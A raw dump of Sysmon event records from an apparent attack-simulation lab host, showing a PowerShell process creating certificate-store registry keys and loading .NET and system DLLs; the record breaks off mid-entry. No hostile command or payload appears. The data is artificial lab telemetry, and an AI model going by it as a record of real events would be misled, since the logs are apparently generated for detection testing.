17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530663Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530662Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530661Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530660Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\trust 12241200x80000000000000001530659Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs 12241200x80000000000000001530658Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs 12241200x80000000000000001530657Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates 12241200x80000000000000001530656Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530655Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\trust 12241200x80000000000000001530654Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CTLs 12241200x80000000000000001530653Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\CRLs 12241200x80000000000000001530652Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople\Certificates 12241200x80000000000000001530651Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x80000000000000001530650Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\TrustedPeople 12241200x80000000000000001530649Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 734700x80000000000000001530648Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\f9f16cefed221a89bd7ccc6559a3e466\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=A2398F5CDEEC4226380CB620C5D180D8,SHA256=4007C9B8A5360D49CD4DA98D262DA539AD790AA13CA54712757441B1C56F2980false-Unavailable 12241200x80000000000000001530647Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530646Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530645Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530644Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530643Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530642Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530641Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530640Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530639Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530638Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530637Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530636Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530635Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x80000000000000001530634Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x80000000000000001530633Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x80000000000000001530632Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530631Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x80000000000000001530630Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x80000000000000001530629Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x80000000000000001530628Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x80000000000000001530627Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x80000000000000001530626Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x80000000000000001530625Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x80000000000000001530624Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x80000000000000001530623Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x80000000000000001530622Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x80000000000000001530621Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x80000000000000001530620Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 12241200x80000000000000001530619Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x80000000000000001530618Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x80000000000000001530617Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x80000000000000001530616Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x80000000000000001530615Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x80000000000000001530614Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 734700x80000000000000001530613Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\3641fa87cb8b7dc353a2444b67599334\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=016FE7AF94AF0BFB824D63F6B0688E43,SHA256=AE20EA6C343733690F1BB9B5963AEA624FFB3B86FAC697FA4C16A753363B291Cfalse-Unavailable 12241200x80000000000000001530612Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x80000000000000001530611Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 11241100x80000000000000001530610Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_qfae2o4a.uku.psm12021-04-21 17:30:15.701 11241100x80000000000000001530609Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_yxpeu4r5.qkk.ps12021-04-21 17:30:15.701 12241200x80000000000000001530608Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x80000000000000001530607Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x80000000000000001530606Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x80000000000000001530605Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 734700x80000000000000001530604Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\1453e82bbe76ed1b635a45bb65c64025\Microsoft.Management.Infrastructure.ni.dll10.0.14393.4046csMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.Management.Infrastructure.dllMD5=C92D154E70E677CA20F60D6658E13BF2,SHA256=1CD14319B7E1B2C5B48591D34F6281F198183740CAD6FCD5CAFCCD8FFCD892D9false-Unavailable 12241200x80000000000000001530603Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 12241200x80000000000000001530602Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x80000000000000001530601Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x80000000000000001530600Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x80000000000000001530599Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 12241200x80000000000000001530598Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 12241200x80000000000000001530597Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x80000000000000001530596Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x80000000000000001530595Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x80000000000000001530594Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 734700x80000000000000001530593Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x80000000000000001530592Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x80000000000000001530591Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530590Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x80000000000000001530589Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530588Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530587Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530586Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530585Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x80000000000000001530584Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x80000000000000001530583Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x80000000000000001530582Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530581Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x80000000000000001530580Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 734700x80000000000000001530579Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:15.701{21761711-6127-6080-BD5D-00000000BB01}1572C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\vcruntime140_1.dll14.28.29913.0 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual 